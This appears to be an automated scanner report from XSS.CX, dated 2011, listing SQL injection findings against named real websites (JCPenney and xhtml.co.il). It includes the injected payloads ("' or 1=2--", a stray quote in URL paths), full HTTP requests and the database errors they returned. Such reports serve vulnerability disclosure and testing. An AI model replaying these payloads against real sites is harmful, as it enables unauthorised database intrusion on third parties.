Set-Cookie: stop_mobi=yes; path=/; domain=jcpenney.com
Content-Length: 332674


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   JCPenney : bedding : sale
</title><link type="text/css" rel
...[SNIP]...
cat=Sale&CatSel=4294953363%7ccomforters+%2b+bedspreads&NOffset=0&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&pcatid=70750&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|72384&mscssid=603af9d85d5c9438286514f9fa553cc17xMnVNoVza3oxMnVNoVza3W200BF8B68695FBB36F2F1793306BC2D0F9FA1107716';
var BBTopDim='categories';
var BBTopVal='comforters + bedspreads';
var BBComboDim='categories';
var BBComboVal='comforters + bedspreads';
var BBCurrDim='categories';
var BBCurrVal='comforters + bedspreads';
var Scene7Server='http://render.jcpenney.com:9910/';
var ZoomServer='http://zoom.jcpenney.com/';
</SCRIPT>

<script language="JavaScript" >
       document.domain = 'jcpenney.com';
</script>
<link type="text/css" rel="stylesheet" href="http://answers.jcpenney.com/answers/1573/static/bazaarvoiceQA.css" />
<script language="JavaScript" type="text/javascript" src="http://answers.jcpenney.com/answers/1573/static/bazaarvoiceQA.js"></script>


<script language="JavaScript" src="Javascript/XGN.js?Version=11172010"></script>
<script language="JavaScript" src='Javascript/XBase.js?Version=11172010'></script>

<script language="javascript" type="text/javascript">
var XGN_QV_BUTTON_OFFSET = { left: 45, top: 151 };

function BVcheckLoadState()
{
}


function displayXGNQVButton(element, url)
{
if (XGNbrowser.MACOS && !XGNbrowser.MozBrowser){return;}

_qvButton = document.getElementById("QVButton");

if (_qvButton != null)
{
_qvButton.style.left = findXGNLeft(element) + element.width - _qvButton.width - XGN_QV_BUTTON_OFFSET.left + "px";
_qvButton.style.top = findXGNTop(element) + XGN_QV_BUTTON_OFFSET.top + "px";    
_qvButton.style.visibility = "visible";
_qvButton.onclick= function() {retrieveAndDisplayData("'" + url + "'");};
}
}

function hideXGNQVButton(e)
{
//not supporting Quickview for the MAC IE
if (XGNbrowser.MACOS && !XGNbrowser.MozBrowser){return;}

e = (e) ? e : ((window.event) ? window.event : null);
var toElement = null;

if (e != null)
{
toElement = e.relatedTarget || e.toElement;
}

if (_qvButton != null && _qvButton != toElement)
{
_qvButton.style.visibility = "hidden";
_qvButton = null;
}
}

function d
...[SNIP]...

Request 2

GET /jcp/XGN.aspx?n=4294953363&catsel=4294953363--comforters+++bedspreads&deptid=70750&pcatid=70750&catid=72384&cattyp=SAL&dep=BEDDING&pcat=BEDDING39333395'%20or%201%3d2--%20&cat=Sale&refpagename=Default%252Easpx&refdeptid=&refcatid=&cmAMS_T=T1&cmAMS_C=C3&CmCatId=homepage&l=1 HTTP/1.1
Host: www4.jcpenney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Content-Type: text/html; charset=utf-8
ntCoent-Length: 331838
Cache-Control: private, max-age=1200
Expires: Fri, 18 Mar 2011 17:10:45 GMT
Date: Fri, 18 Mar 2011 16:50:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: stop_mobi=yes; path=/; domain=jcpenney.com
Content-Length: 331838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   JCPenney : bedding : sale
</title><link type="text/css" rel
...[SNIP]...
cat=Sale&CatSel=4294953363%7ccomforters+%2b+bedspreads&NOffset=0&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&pcatid=70750&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|72384&mscssid=6f4bba04b6eb248d3bdd2b74cbd3b976dxMnVNoVza3oxMnVNoVza3W200B90EF05077B21973E31A2B7A80FFC8FFB1107716';
var BBTopDim='categories';
var BBTopVal='comforters + bedspreads';
var BBComboDim='categories';
var BBComboVal='comforters + bedspreads';
var BBCurrDim='categories';
var BBCurrVal='comforters + bedspreads';
var Scene7Server='http://render.jcpenney.com:9910/';
var ZoomServer='http://zoom.jcpenney.com/';
</SCRIPT>

<script language="JavaScript" >
       document.domain = 'jcpenney.com';
</script>
<link type="text/css" rel="stylesheet" href="http://answers.jcpenney.com/answers/1573/static/bazaarvoiceQA.css" />
<script language="JavaScript" type="text/javascript" src="http://answers.jcpenney.com/answers/1573/static/bazaarvoiceQA.js"></script>


<script language="JavaScript" src="Javascript/XGN.js?Version=11172010"></script>
<script language="JavaScript" src='Javascript/XBase.js?Version=11172010'></script>

<script language="javascript" type="text/javascript">
var XGN_QV_BUTTON_OFFSET = { left: 45, top: 151 };

function BVcheckLoadState()
{
}


function displayXGNQVButton(element, url)
{
if (XGNbrowser.MACOS && !XGNbrowser.MozBrowser){return;}

_qvButton = document.getElementById("QVButton");

if (_qvButton != null)
{
_qvButton.style.left = findXGNLeft(element) + element.width - _qvButton.width - XGN_QV_BUTTON_OFFSET.left + "px";
_qvButton.style.top = findXGNTop(element) + XGN_QV_BUTTON_OFFSET.top + "px";    
_qvButton.style.visibility = "visible";
_qvButton.onclick= function() {retrieveAndDisplayData("'" + url + "'");};
}
}

function hideXGNQVButton(e)
{
//not supporting Quickview for the MAC IE
if (XGNbrowser.MACOS && !XGNbrowser.MozBrowser){return;}

e = (e) ? e : ((window.event) ? window.event : null);
var toElement = null;

if (e != null)
{
toElement = e.relatedTarget || e.toElement;
}

if (_qvButton != null && _qvButton != toElement)
{
_qvButton.style.visibility = "hidden";
_qvButton = null;
}
}

function d
...[SNIP]...
1.160. http://xhtml.co.il/he/page-700/jQuery [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://xhtml.co.il
Path:   /he/page-700/jQuery

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /he/page-700'/jQuery HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:42:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Tue, 17 May 2011 16:42:27 GMT
Set-Cookie: PHPSESSID=08faaa5e7173d902616a5a9a2333ceea; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 172

<!DOCTYPE html>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1
1.161. http://xhtml.co.il/ru/page-1013/jQuery.browser [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Firm
Host:   http://xhtml.co.il
Path:   /ru/page-1013/jQuery.browser

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ru/page-1013'/jQuery.browser HTTP/1.1
Host: xhtml.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:43:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Pragma: public
Cache-Control: maxage=5184000
Expires: Tue, 17 May 2011 16:43:20 GMT
Set-Cookie: PHPSESSID=16bb31dabadc089a279e6553a8dc85e7; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 172

<!DOCTYPE html>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1
Report generated by XSS.CX at Fri Mar 25 13:31:53 CDT 2011.